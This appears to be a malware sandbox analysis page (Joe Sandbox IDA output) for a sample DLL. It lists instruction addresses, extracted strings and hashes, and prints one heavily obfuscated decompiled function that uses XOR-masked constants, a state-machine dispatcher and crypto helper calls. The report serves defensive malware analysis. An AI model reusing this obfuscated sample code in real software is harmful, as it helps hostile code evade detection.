0x02b4349c
0x02b4349f
0x02b434a3
0x02b434a8
0x02b434b0
0x02b434bb
0x02b434c6
0x02b434d1
0x02b434dc
0x02b434e4
0x02b434ef
0x02b434fa
0x02b43505
0x02b43510
0x02b4351b
0x02b43526
0x02b43539
0x02b43540
0x02b4354d
0x02b43555
0x02b4355d
0x02b43565
0x02b4356a
0x02b43572
0x02b4357d
0x02b43588
0x02b43593
0x02b4359e
0x02b435a6
0x02b435b1
0x02b435c5
0x02b435ca
0x02b435d3
0x02b435de
0x02b435ea
0x02b435ef
0x02b435f5
0x02b435fd
0x02b43602
0x02b4360a
0x02b43615
0x02b43620
0x02b4362b
0x02b4363e
0x02b43641
0x02b43653
0x02b4365a
0x02b43665
0x02b43670
0x02b43678
0x02b43683
0x02b4368e
0x02b43696
0x02b4369e
0x02b436a9
0x02b436b4
0x02b436bf
0x02b436ca
0x02b436d7
0x02b436da
0x02b436de
0x02b436e3
0x02b436eb
0x02b436f3
0x02b43703
0x02b43707
0x02b4370f
0x02b43717
0x02b4371f
0x02b43727
0x02b4372f
0x02b43737
0x02b4373c
0x02b43744
0x02b43756
0x02b43759
0x02b43760
0x02b4376d
0x02b43775
0x02b43784
0x02b43787
0x02b4378e
0x02b43792
0x02b4379a
0x02b437a2
0x02b437b2
0x02b437ba
0x02b437bf
0x02b437c6
0x02b437ca
0x02b437d2
0x02b437da
0x02b437ee
0x02b437f5
0x02b437fc
0x02b43807
0x02b4381a
0x02b43821
0x02b43829
0x02b43834
0x02b4383f
0x02b43852
0x02b43859
0x02b43864
0x02b4386f
0x02b4387a
0x02b43885
0x02b43890
0x02b43898
0x02b438a3
0x02b438ae
0x02b438b9
0x02b438c1
0x02b438cc
0x02b438d7
0x02b438e2
0x02b438ed
0x02b438f5
0x02b438fd
0x02b4390a
0x02b4390e
0x02b43916
0x02b43921
0x02b4392c
0x02b43934
0x02b4393f
0x02b4393f
0x02b4393f
0x02b43944
0x02b43944
0x02b43944
0x02b43944
0x02b4394a
0x00000000
0x00000000
0x02b43be6
0x02b43be8
0x02b43ca8
0x02b43caf
0x02b43cb2
0x02b43cc7
0x02b43ccc
0x02b43cd3
0x02b43cda
0x02b43d26
0x02b43d34
0x02b43d39
0x02b43d40
0x02b43d43
0x02b43d48
0x00000000
0x02b43d48
0x02b43bee
0x02b43bf4
0x02b43c6d
0x02b43c84
0x02b43c85
0x02b43c87
0x02b43c8c
0x02b43c8f
0x02b43c96
0x02b43c98
0x02b43a22
0x02b43a22
0x02b43c9e
0x02b43a8d
0x02b43a8d
0x02b4393f
0x02b4393f
0x02b4393f
0x00000000
0x02b4393f
0x02b4393f
0x02b43bf6
0x02b43bfc
0x02b43c36
0x02b43c37
0x02b43c41
0x02b43c4a
0x02b43c4b
0x02b43c4c
0x02b43c59
0x02b43c5a
0x02b43c5f
0x02b43a8a
0x02b43a8a
0x00000000
0x02b43a8a
0x02b43bfe
0x02b43c04
0x02b43d77
0x00000000
0x02b43d7e
0x02b43c0a
0x02b43c10
0x00000000
0x00000000
0x02b43c16
0x02b43c16
0x02b43950
0x02b43bb0
0x02b43bc1
0x02b43bc2
0x02b43bc4
0x02b43bc9
0x02b43bcd
0x02b43bcf
0x02b43bd7
0x02b43bd9
0x02b43bde
0x00000000
0x02b43bde
0x02b4395c
0x02b43b72
0x02b43b73
0x02b43b7d
0x02b43b86
0x02b43b87
0x02b43b88
0x02b43b95
0x02b43b96
0x02b43b9b
0x00000000
0x02b43b9b
0x02b43968
0x02b43b46
0x02b43b4b
0x02b43b52
0x02b43b55
0x02b43b5a
0x00000000
0x02b43b5a
0x02b43974
0x02b43a9d
0x02b43ab6
0x02b43ab7
0x02b43ac1
0x02b43ac3
0x02b43ac6
0x02b43acd
0x02b43acf
0x02b43ad1
0x02b43ad3
0x02b43adc
0x02b43adc
0x02b43ade
0x02b43ae0
0x02b43ae2
0x02b43ae5
0x02b43ae5
0x02b43ae5
0x02b43ae5
0x02b43afe
0x02b43aff
0x02b43b04
0x02b43b09
0x02b43b0a
0x02b43b0c
0x02b43b0d
0x02b43b1d
0x02b43b1e
0x02b43b23
0x00000000
0x02b43b23
0x02b43980
0x02b43a23
0x02b43a2c
0x02b43a33
0x02b43a3e
0x02b43a43
0x02b43a54
0x02b43a55
0x02b43a56
0x02b43a57
0x02b43a66
0x02b43a80
0x02b43a85
0x00000000
0x02b43a85
0x02b43986
0x02b4398c
0x00000000
0x00000000
0x02b43992
0x02b43996
0x02b439a5
0x02b439d6
0x02b439fb
0x02b43a00
0x02b43a0c
0x02b43a0e
0x02b43a11
0x00000000
0x02b43d4d
0x02b43d4d
0x02b43d4d
0x00000000
0x02b43d59

Strings

$7, xrefs: 02B43231
8j, xrefs: 02B435A6
IF, xrefs: 02B43380
!s9, xrefs: 02B43375
3, xrefs: 02B42FBA
Sg, xrefs: 02B43098
kn_, xrefs: 02B430C2
DO, xrefs: 02B4371F
I,, xrefs: 02B42F85
-3n3, xrefs: 02B42F18
DJ3, xrefs: 02B42F28
|I9, xrefs: 02B431A7
5S, xrefs: 02B4357D
*a<, xrefs: 02B4354D
1TPy, xrefs: 02B4310C
9I , xrefs: 02B43834
Gd, xrefs: 02B43117

Memory Dump Source

Source File: 00000001.00000002.321766377.0000000002B31000.00000020.00000001.sdmp, Offset: 02B30000, based on PE: true

Associated: 00000001.00000002.321760643.0000000002B30000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.321787146.0000000002B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: !s9$*a<$-3n3$1TPy$5S$8j$9I $DJ3$IF$Sg$kn_$|I9$$7$3$DO$Gd$I,
API String ID: 0-3070105227
Opcode ID: a6e0f22b8e1f60952987cb0b2deda239747e379bbf29fd711d3ad8d1dc287183
Instruction ID: e40b790dd265066c96e8c6259a2b2f16832e2eb1f1423ab5799f654f3c11bb2b
Opcode Fuzzy Hash: a6e0f22b8e1f60952987cb0b2deda239747e379bbf29fd711d3ad8d1dc287183
Instruction Fuzzy Hash: 8572F0715083819BD3B8CF25C58AB9BFBE1BBC4718F10891DE5DA96260DBB09949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 02B33431, Relevance: 17.0, Strings: 13, Instructions: 746
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E02B33431(intOrPtr __ecx) {
				char _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				char* _v48;
				intOrPtr _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				char _v68;
				intOrPtr _v72;
				char _v76;
				char _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				unsigned int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				signed int _v428;
				signed int _v432;
				signed int _v436;
				signed int _v440;
				signed int _v444;
				signed int _v448;
				void* _t880;
				void* _t883;
				intOrPtr _t884;
				intOrPtr _t891;
				void* _t892;
				signed int _t894;
				char _t897;
				void* _t905;
				intOrPtr _t918;
				void* _t919;
				intOrPtr _t925;
				intOrPtr _t927;
				void* _t929;
				signed int _t935;
				signed int _t936;
				signed int _t937;
				signed int _t938;
				signed int _t939;
				signed int _t940;
				signed int _t941;
				signed int _t942;
				signed int _t943;
				signed int _t944;
				signed int _t945;
				signed int _t946;
				signed int _t947;
				signed int _t948;
				signed int _t949;
				signed int _t950;
				signed int _t951;
				void* _t952;
				intOrPtr _t974;
				intOrPtr _t977;
				void* _t1017;
				intOrPtr _t1018;
				void* _t1038;
				intOrPtr _t1039;
				void* _t1041;
				void* _t1046;
				signed int* _t1048;
				signed int* _t1052;
				void* _t1054;

				_t1048 =  &_v448;
				_v436 = 0x369131;
				_v436 = _v436 >> 0xc;
				_v72 = __ecx;
				_t1046 = 0;
				_t935 = 0x47;
				_v436 = _v436 / _t935;
				_t929 = 0xda5043f;
				_t936 = 0x5f;
				_v436 = _v436 * 0x17;
				_v436 = _v436 ^ 0x4d42455f;
				_v208 = 0xf6fdfa;
				_v208 = _v208 | 0x2cc981c8;
				_v208 = _v208 ^ 0x2cfffdfb;
				_v424 = 0xd0dd87;
				_v424 = _v424 << 0xd;
				_v424 = _v424 | 0x1c0753be;
				_v424 = _v424 << 0xb;
				_v424 = _v424 ^ 0xbf9df000;
				_v168 = 0x27916c;
				_v168 = _v168 << 0xc;
				_v168 = _v168 ^ 0x7916c000;
				_v112 = 0xb477a9;
				_v112 = _v112 << 0xb;
				_v112 = _v112 ^ 0xa3bd4800;
				_v220 = 0xe97999;
				_v220 = _v220 + 0xffffec6a;
				_v220 = _v220 ^ 0x00e96603;
				_v204 = 0x9e1a7f;
				_v204 = _v204 >> 5;
				_v204 = _v204 ^ 0x0004f0d3;
				_v268 = 0x424ea5;
				_v268 = _v268 ^ 0x63de6ac8;
				_v268 = _v268 + 0xffff47e2;
				_v268 = _v268 ^ 0x639b6c4f;
				_v260 = 0xd00e0b;
				_v260 = _v260 + 0x7bec;
				_v260 = _v260 + 0x9dda;
				_v260 = _v260 ^ 0x00d127d1;
				_v200 = 0x4c3c29;
				_v200 = _v200 + 0xffffc8b9;
				_v200 = _v200 ^ 0x004c04e2;
				_v248 = 0x4debf8;
				_v248 = _v248 + 0xffff1b2a;
				_v248 = _v248 << 9;
				_v248 = _v248 ^ 0x9a0e4400;
				_v228 = 0x8afd86;
				_v228 = _v228 / _t936;
				_v228 = _v228 << 4;
				_v228 = _v228 ^ 0x001768a0;
				_v96 = 0x2eb3c6;
				_v96 = _v96 << 0xd;
				_v96 = _v96 ^ 0xd678c020;
				_v420 = 0x274aed;
				_v420 = _v420 | 0x31740d1a;
				_v420 = _v420 + 0xffff9582;
				_v420 = _v420 | 0x350cf820;
				_v420 = _v420 ^ 0x35767196;
				_v364 = 0x6881b7;
				_v364 = _v364 * 7;
				_v364 = _v364 + 0xffffc912;
				_v364 = _v364 * 0x25;
				_v364 = _v364 ^ 0x69b6ddf9;
				_v184 = 0xd44f20;
				_v184 = _v184 ^ 0xce5a0ea9;
				_v184 = _v184 ^ 0xce89b855;
				_v264 = 0x81d5a2;
				_v264 = _v264 >> 8;
				_v264 = _v264 ^ 0x29112c15;
				_v264 = _v264 ^ 0x291faa41;
				_v100 = 0x37cb15;
				_t937 = 6;
				_v100 = _v100 * 0x62;
				_v100 = _v100 ^ 0x1559514e;
				_v380 = 0xd5dbc2;
				_v380 = _v380 ^ 0x7753e321;
				_v380 = _v380 + 0xffff7b0c;
				_v380 = _v380 << 8;
				_v380 = _v380 ^ 0x85ba1641;
				_v176 = 0xe5b425;
				_v176 = _v176 ^ 0xa878a978;
				_v176 = _v176 ^ 0xa898c785;
				_v120 = 0xd260b8;
				_v120 = _v120 / _t937;
				_v120 = _v120 ^ 0x00230c57;
				_v288 = 0xdcc1d5;
				_v288 = _v288 | 0xf1bc740f;
				_v288 = _v288 >> 0xf;
				_v288 = _v288 ^ 0x000063e4;
				_v232 = 0xe5d66a;
				_t938 = 0x2c;
				_v232 = _v232 * 0x6c;
				_v232 = _v232 / _t938;
				_v232 = _v232 ^ 0x02301c7d;
				_v296 = 0x2a124;
				_v296 = _v296 | 0xd0f8a1f6;
				_v296 = _v296 >> 3;
				_v296 = _v296 ^ 0x1a145567;
				_v160 = 0xc3c6af;
				_v160 = _v160 + 0xd2dc;
				_v160 = _v160 ^ 0x00c22786;
				_v348 = 0x8f150e;
				_v348 = _v348 + 0xa59e;
				_t939 = 0x59;
				_v348 = _v348 / _t939;
				_v348 = _v348 >> 0xe;
				_v348 = _v348 ^ 0x00038203;
				_v412 = 0x22c1c6;
				_v412 = _v412 | 0x52a0f1e9;
				_v412 = _v412 >> 0xe;
				_v412 = _v412 + 0x5f9c;
				_v412 = _v412 ^ 0x0003206f;
				_v256 = 0x6eace8;
				_v256 = _v256 | 0x5e36471d;
				_v256 = _v256 + 0xaa22;
				_v256 = _v256 ^ 0x5e7c911d;
				_v372 = 0x114227;
				_v372 = _v372 << 0xe;
				_v372 = _v372 >> 4;
				_v372 = _v372 + 0xffff3250;
				_v372 = _v372 ^ 0x05091a3a;
				_v152 = 0xb2c113;
				_v152 = _v152 | 0xd4a79ff0;
				_v152 = _v152 ^ 0xd4b69369;
				_v404 = 0xac8dd0;
				_v404 = _v404 | 0xfe2c74c4;
				_v404 = _v404 + 0xfffff2df;
				_v404 = _v404 ^ 0xd6ca137b;
				_v404 = _v404 ^ 0x2865160f;
				_v92 = 0xc872d4;
				_v92 = _v92 ^ 0x1ab36d9e;
				_v92 = _v92 ^ 0x1a793755;
				_v104 = 0x4ab196;
				_v104 = _v104 << 8;
				_v104 = _v104 ^ 0x4ab50517;
				_v448 = 0xada0e7;
				_t940 = 0x71;
				_v448 = _v448 * 0x69;
				_v448 = _v448 ^ 0xf900bd50;
				_v448 = _v448 + 0x197e;
				_v448 = _v448 ^ 0xbe3853b0;
				_v396 = 0x11e923;
				_v396 = _v396 + 0x3954;
				_v396 = _v396 / _t940;
				_v396 = _v396 >> 0xc;
				_v396 = _v396 ^ 0x00018e0c;
				_v336 = 0x5f85c1;
				_v336 = _v336 | 0x2e05641a;
				_v336 = _v336 + 0xffffe3b2;
				_v336 = _v336 ^ 0x2e57dda5;
				_v144 = 0xd04b4f;
				_v144 = _v144 | 0x24a920ad;
				_v144 = _v144 ^ 0x24f2194c;
				_v332 = 0xa51135;
				_v332 = _v332 | 0x0e3f3b11;
				_v332 = _v332 << 1;
				_v332 = _v332 ^ 0x1d7bc296;
				_v432 = 0x91d3da;
				_v432 = _v432 ^ 0xfb7827da;
				_v432 = _v432 ^ 0x8307cadb;
				_v432 = _v432 ^ 0x96a6215b;
				_v432 = _v432 ^ 0xee460da5;
				_v440 = 0x76ea73;
				_t941 = 0x68;
				_v440 = _v440 * 0x64;
				_v440 = _v440 * 0x74;
				_v440 = _v440 + 0xffff4177;
				_v440 = _v440 ^ 0x0c5f6cc4;
				_v84 = 0xe35803;
				_v84 = _v84 << 2;
				_v84 = _v84 ^ 0x038e6518;
				_v416 = 0xaf3ba8;
				_v416 = _v416 / _t941;
				_v416 = _v416 << 4;
				_v416 = _v416 ^ 0x48935165;
				_v416 = _v416 ^ 0x4881449f;
				_v212 = 0x801900;
				_v212 = _v212 + 0xffff42b5;
				_v212 = _v212 ^ 0x0072cd25;
				_v308 = 0xdd451d;
				_v308 = _v308 << 7;
				_v308 = _v308 + 0xffff5c98;
				_v308 = _v308 ^ 0x6ea87981;
				_v400 = 0xde1a46;
				_v400 = _v400 + 0xffff765a;
				_v400 = _v400 / _t941;
				_v400 = _v400 << 9;
				_v400 = _v400 ^ 0x044894be;
				_v316 = 0xd965ab;
				_t942 = 0x67;
				_v316 = _v316 / _t942;
				_v316 = _v316 ^ 0xab5bfdd1;
				_v316 = _v316 ^ 0xab5ad192;
				_v408 = 0x2ea377;
				_v408 = _v408 ^ 0x7c77aa70;
				_v408 = _v408 * 0x1b;
				_t943 = 0x5b;
				_v408 = _v408 / _t943;
				_v408 = _v408 ^ 0x00544ec9;
				_v324 = 0xbe9a08;
				_t944 = 0x3b;
				_v324 = _v324 * 0x43;
				_v324 = _v324 >> 2;
				_v324 = _v324 ^ 0x0c769314;
				_v300 = 0x976b15;
				_v300 = _v300 + 0xffff7da5;
				_v300 = _v300 ^ 0x81b758ca;
				_v300 = _v300 ^ 0x81238506;
				_v180 = 0xcec496;
				_v180 = _v180 + 0xd8a;
				_v180 = _v180 ^ 0x00c56088;
				_v188 = 0xaed086;
				_v188 = _v188 / _t944;
				_v188 = _v188 ^ 0x0009ea52;
				_v196 = 0x3b56fa;
				_v196 = _v196 ^ 0xac6111bd;
				_v196 = _v196 ^ 0xac5e4370;
				_v292 = 0x9c517b;
				_t945 = 0xe;
				_v292 = _v292 * 0x4d;
				_v292 = _v292 << 0x10;
				_v292 = _v292 ^ 0x81f0babf;
				_v164 = 0xb8b001;
				_v164 = _v164 * 0x6d;
				_v164 = _v164 ^ 0x4ea63487;
				_v172 = 0xad6cfe;
				_v172 = _v172 + 0xffff2ed4;
				_v172 = _v172 ^ 0x00a06f33;
				_v392 = 0x7c182;
				_v392 = _v392 + 0xffff354a;
				_v392 = _v392 >> 9;
				_v392 = _v392 | 0x25902c29;
				_v392 = _v392 ^ 0x259a4e3f;
				_v384 = 0x5bc0d6;
				_v384 = _v384 << 1;
				_v384 = _v384 >> 3;
				_v384 = _v384 >> 0xb;
				_v384 = _v384 ^ 0x00007445;
				_v148 = 0xb53a42;
				_v148 = _v148 + 0x9a8c;
				_v148 = _v148 ^ 0x00ba1df9;
				_v340 = 0x4937cc;
				_v340 = _v340 / _t945;
				_v340 = _v340 * 0x55;
				_v340 = _v340 ^ 0x01b4526f;
				_v156 = 0xcb2355;
				_v156 = _v156 + 0x87d8;
				_v156 = _v156 ^ 0x00cab12c;
				_v276 = 0x1d3606;
				_v276 = _v276 ^ 0xef8573e3;
				_v276 = _v276 + 0xe74c;
				_v276 = _v276 ^ 0xef9451f2;
				_v124 = 0xea90d8;
				_v124 = _v124 >> 0xc;
				_v124 = _v124 ^ 0x000c3a09;
				_v132 = 0x9d7def;
				_v132 = _v132 << 0xe;
				_v132 = _v132 ^ 0x5f719987;
				_v376 = 0x89d7c2;
				_v376 = _v376 + 0xfffff23e;
				_v376 = _v376 | 0x7c68b11f;
				_v376 = _v376 ^ 0xbb3726b5;
				_v376 = _v376 ^ 0xc7d510ca;
				_v140 = 0x76a014;
				_t946 = 0x62;
				_v140 = _v140 * 0x5d;
				_v140 = _v140 ^ 0x2b1c15f7;
				_v236 = 0x97a0b2;
				_v236 = _v236 + 0xb8c3;
				_v236 = _v236 / _t946;
				_v236 = _v236 ^ 0x00048326;
				_v244 = 0xf40f05;
				_v244 = _v244 >> 9;
				_v244 = _v244 + 0xffff2918;
				_v244 = _v244 ^ 0xfff951ac;
				_v252 = 0x8be7d4;
				_t947 = 0x63;
				_v252 = _v252 * 0x1e;
				_v252 = _v252 | 0x42cac185;
				_v252 = _v252 ^ 0x52ef1e67;
				_v116 = 0xbde76;
				_v116 = _v116 * 0x7b;
				_v116 = _v116 ^ 0x05b04958;
				_v328 = 0xeb1d65;
				_v328 = _v328 + 0xffffd1f9;
				_v328 = _v328 / _t947;
				_v328 = _v328 ^ 0x00025d34;
				_v280 = 0x68b6dc;
				_v280 = _v280 << 4;
				_v280 = _v280 + 0xffffca90;
				_v280 = _v280 ^ 0x06815cee;
				_v284 = 0x6fbf52;
				_t948 = 0x39;
				_v284 = _v284 / _t948;
				_v284 = _v284 >> 0xc;
				_v284 = _v284 ^ 0x000af32e;
				_v128 = 0xe16a7a;
				_v128 = _v128 << 0xa;
				_v128 = _v128 ^ 0x85a6bd86;
				_v136 = 0xc45446;
				_v136 = _v136 * 0x2c;
				_v136 = _v136 ^ 0x21b71382;
				_v356 = 0x71f336;
				_v356 = _v356 ^ 0x2de7f7fe;
				_v356 = _v356 ^ 0x8a07c7d3;
				_v356 = _v356 ^ 0x93c759d9;
				_v356 = _v356 ^ 0x3457e38a;
				_v444 = 0xc2e3ca;
				_v444 = _v444 + 0xd370;
				_v444 = _v444 * 0x17;
				_v444 = _v444 | 0x81628588;
				_v444 = _v444 ^ 0x91feaa64;
				_v216 = 0xda26e7;
				_v216 = _v216 | 0x60c5a9c9;
				_v216 = _v216 ^ 0x60dd12b5;
				_v192 = 0x3f7410;
				_v192 = _v192 ^ 0x1d5bbab7;
				_v192 = _v192 ^ 0x1d6fbf93;
				_v312 = 0x4ada65;
				_v312 = _v312 << 0xd;
				_v312 = _v312 >> 7;
				_v312 = _v312 ^ 0x00bfdaf9;
				_v272 = 0xabf11;
				_v272 = _v272 | 0xa59dca8e;
				_v272 = _v272 + 0x20a8;
				_v272 = _v272 ^ 0xa5a7fe59;
				_v224 = 0x8674d0;
				_t1041 = 0x129d0b2;
				_t1038 = 0x319c4b5;
				_t949 = 0x14;
				_v224 = _v224 / _t949;
				_v224 = _v224 ^ 0x000de1f0;
				_v320 = 0xda9bb0;
				_v320 = _v320 | 0x2a57cad9;
				_t950 = 0x36;
				_v320 = _v320 * 0xf;
				_v320 = _v320 ^ 0x831ebdeb;
				_v240 = 0xa163ed;
				_v240 = _v240 * 0xb;
				_v240 = _v240 ^ 0x8dcbf844;
				_v240 = _v240 ^ 0x8b2bfc33;
				_v428 = 0x5ed42b;
				_v428 = _v428 + 0xffff1d19;
				_v428 = _v428 * 0x50;
				_v428 = _v428 << 2;
				_v428 = _v428 ^ 0x75680dd8;
				_v88 = 0xfa72dc;
				_v88 = _v88 >> 7;
				_v88 = _v88 ^ 0x0007f8f8;
				_v388 = 0x10dc91;
				_v388 = _v388 / _t950;
				_v388 = _v388 >> 2;
				_v388 = _v388 | 0xaac1de12;
				_v388 = _v388 ^ 0xaac723cf;
				_v304 = 0xa7cb34;
				_v304 = _v304 ^ 0x1c82ce84;
				_v304 = _v304 + 0xffff27ec;
				_v304 = _v304 ^ 0x1c2c2c1b;
				_v360 = 0x85a407;
				_v360 = _v360 << 0x10;
				_v360 = _v360 ^ 0xf399b7e8;
				_t951 = 0x7b;
				_v360 = _v360 * 0xb;
				_v360 = _v360 ^ 0xc3d703da;
				_v108 = 0x2c5900;
				_v108 = _v108 | 0x18e96d33;
				_v108 = _v108 ^ 0x18efd740;
				_v368 = 0x82a9c5;
				_v368 = _v368 * 0x63;
				_v368 = _v368 / _t951;
				_v368 = _v368 << 9;
				_v368 = _v368 ^ 0xd254d318;
				_v344 = 0x646456;
				_v344 = _v344 | 0x8bd14a3d;
				_v344 = _v344 ^ 0xb757bf6b;
				_v344 = _v344 ^ 0xc7e8113d;
				_v344 = _v344 ^ 0xfb40f9ed;
				_v352 = 0x76afda;
				_v352 = _v352 | 0xbd2b6ebb;
				_v352 = _v352 + 0xffffcbc9;
				_v352 = _v352 << 5;
				_v352 = _v352 ^ 0xaffdfdca;
				while(1) {
					L1:
					_t1017 = 0xbed0fa7;
					_t952 = 0x2dc73db;
					_t880 = 0x45ef02b;
					goto L2;
					do {
						while(1) {
							L2:
							_t1054 = _t929 - _t880;
							if(_t1054 <= 0) {
								break;
							}
							__eflags = _t929 - 0xa3576f8;
							if(_t929 == 0xa3576f8) {
								_t1018 =  *0x2b56224; // 0x0
								E02B52B09(_v360,  *((intOrPtr*)(_t1018 + 0x50)), _v108, _v368);
								_t929 = _t1038;
								L25:
								_t880 = 0x45ef02b;
								_t952 = 0x2dc73db;
								_t1017 = 0xbed0fa7;
								goto L26;
							}
							__eflags = _t929 - _t1017;
							if(__eflags == 0) {
								_push(_v156);
								_push(_v340);
								_push(_v148);
								_t883 = E02B4E1F8(0x2b313f8, _v384, __eflags);
								_t884 =  *0x2b56224; // 0x0
								__eflags = E02B3F288(_v268, _v276, _t883, _v124,  &_v76, _t884 + 0x54, _v132, 0x2b313f8, _v376, _v80, _v140) - _v260;
								_t929 =  ==  ? 0x2dc73db : _t1038;
								E02B4FECB(_t883, _v236, _v244, _v252, _v116);
								_t1048 =  &(_t1048[0xf]);
								L15:
								_t1041 = 0x129d0b2;
								goto L25;
							}
							__eflags = _t929 - 0xda5043f;
							if(__eflags != 0) {
								goto L26;
							}
							_t929 = 0x2e16ae;
						}
						if(_t1054 == 0) {
							_push(_v336);
							_push(_v396);
							_push(_v448);
							_t891 = E02B4E1F8(0x2b313a8, _v104, __eflags);
							_push(_v440);
							_t1039 = _t891;
							_push(_v432);
							_push(_v332);
							_t892 = E02B4E1F8(0x2b31498, _v144, __eflags);
							_v64 = _v424;
							_t894 = E02B400C5(_t1039, _v84, _v416);
							_v56 = _v56 & 0x00000000;
							_v60 = _t1039;
							_v52 = 1;
							_v68 = 2 + _t894 * 2;
							_v48 =  &_v68;
							_t897 = 0x20;
							_v76 = _t897;
							__eflags = E02B349A4(_v212,  &_v56, _v308,  &_v32, _v400, _v220, _v316,  &_v76, _v72, _t897, _t892, _v408, _v324) - _v204;
							_t929 =  ==  ? 0xbed0fa7 : 0x319c4b5;
							E02B4FECB(_t1039, _v300, _v180, _v188, _v196);
							E02B4FECB(_t892, _v292, _v164, _v172, _v392);
							_t1048 =  &(_t1048[0x18]);
							L17:
							_t1038 = 0x319c4b5;
							goto L15;
						}
						if(_t929 == 0x2e16ae) {
							_push(_v264);
							_push(_v184);
							_push(_v364);
							_t905 = E02B4E1F8(0x2b31468, _v420, __eflags);
							_push(_v120);
							_push(_v176);
							_push(_v380);
							__eflags = E02B3738A(_v288, _t905, _v232, _v168,  &_v80, E02B4E1F8(0x2b31318, _v100, __eflags), _v296) - _v112;
							_t929 =  ==  ? 0x45ef02b : 0x45eecb1;
							E02B4FECB(_t905, _v160, _v348, _v412, _v256);
							E02B4FECB(_t906, _v372, _v152, _v404, _v92);
							_t1048 =  &(_t1048[0x11]);
							goto L17;
						}
						if(_t929 == _t1041) {
							_push(_v216);
							_push(_v444);
							_push(_v356);
							_t1045 = E02B4E1F8(0x2b31438, _v136, __eflags);
							_v44 = _v436;
							_v40 = _v208;
							_v36 = _v96;
							_t918 =  *0x2b56224; // 0x0
							_t974 =  *0x2b56224; // 0x0
							_t919 = E02B350E8( *((intOrPtr*)(_t974 + 0x54)), _v192, _v312, _v272, _v224,  *((intOrPtr*)(_t918 + 0x50)), _v80, _v320, 0x2b31438, 0x2b31438,  &_v44, _v200, 0x2b31438, _v240, _t913);
							_t1052 =  &(_t1048[0x10]);
							__eflags = _t919 - _v248;
							if(_t919 != _v248) {
								_t929 = 0xa3576f8;
							} else {
								_t929 = _t1038;
								_t1046 = 1;
							}
							E02B4FECB(_t1045, _v428, _v88, _v388, _v304);
							_t1048 =  &(_t1052[3]);
							goto L15;
						}
						if(_t929 == _t952) {
							_t925 =  *0x2b56224; // 0x0
							_push(_t952);
							_push(_t952);
							_t977 = E02B3C5D8( *((intOrPtr*)(_t925 + 0x54)));
							_t1048 =  &(_t1048[3]);
							_t927 =  *0x2b56224; // 0x0
							__eflags = _t977;
							_t929 =  !=  ? _t1041 : _t1038;
							 *((intOrPtr*)(_t927 + 0x50)) = _t977;
							goto L1;
						}
						if(_t929 != _t1038) {
							goto L26;
						}
						E02B3F7FE(_v344, _v80, _v352, _v228);
						L9:
						return _t1046;
						L26:
						__eflags = _t929 - 0x45eecb1;
					} while (__eflags != 0);
					goto L9;
				}
			}

0x02b33431
0x02b33437
0x02b33441
0x02b33450
0x02b33457
0x02b33459
0x02b3345e
0x02b33469
0x02b3346e
0x02b3346f
0x02b33473
0x02b3347b
0x02b33486
0x02b33491
0x02b3349c
0x02b334a4
0x02b334a9
0x02b334b1
0x02b334b6
0x02b334be
0x02b334c9
0x02b334d1
0x02b334dc
0x02b334e7
0x02b334ef
0x02b334fa
0x02b33505
0x02b33510
0x02b3351b
0x02b33526
0x02b3352e
0x02b33539
0x02b33544
0x02b3354f
0x02b3355a
0x02b33565
0x02b33570
0x02b3357b
0x02b33586
0x02b33591
0x02b3359c
0x02b335a7
0x02b335b2
0x02b335bd
0x02b335c8
0x02b335d0
0x02b335db
0x02b335ef
0x02b335f6
0x02b335fe
0x02b33609
0x02b33614
0x02b3361c
0x02b33627
0x02b3362f
0x02b33637
0x02b3363f
0x02b33647
0x02b3364f
0x02b3365c
0x02b33660
0x02b3366d
0x02b33671
0x02b33679
0x02b33684
0x02b3368f
0x02b3369a
0x02b336a5
0x02b336af
0x02b336ba
0x02b336c5
0x02b336da
0x02b336dd
0x02b336e4
0x02b336ef
0x02b336f7
0x02b336ff
0x02b33707
0x02b3370c
0x02b33714
0x02b3371f
0x02b3372a
0x02b33735
0x02b3374b
0x02b33752
0x02b3375d
0x02b33768
0x02b33773
0x02b3377b
0x02b33786
0x02b33799
0x02b3379c
0x02b337ae
0x02b337b5
0x02b337c0
0x02b337cb
0x02b337d6
0x02b337de
0x02b337e9
0x02b337f4
0x02b337ff
0x02b3380a
0x02b33812
0x02b3381e
0x02b33821
0x02b33825
0x02b3382a
0x02b33832
0x02b3383a
0x02b33842
0x02b33847
0x02b3384f
0x02b33857
0x02b33862
0x02b3386d
0x02b33878
0x02b33883
0x02b3388b
0x02b33890
0x02b33895
0x02b3389d
0x02b338a5
0x02b338b0
0x02b338bb
0x02b338c6
0x02b338ce
0x02b338d6
0x02b338de
0x02b338e6
0x02b338ee
0x02b338f9
0x02b33904
0x02b3390f
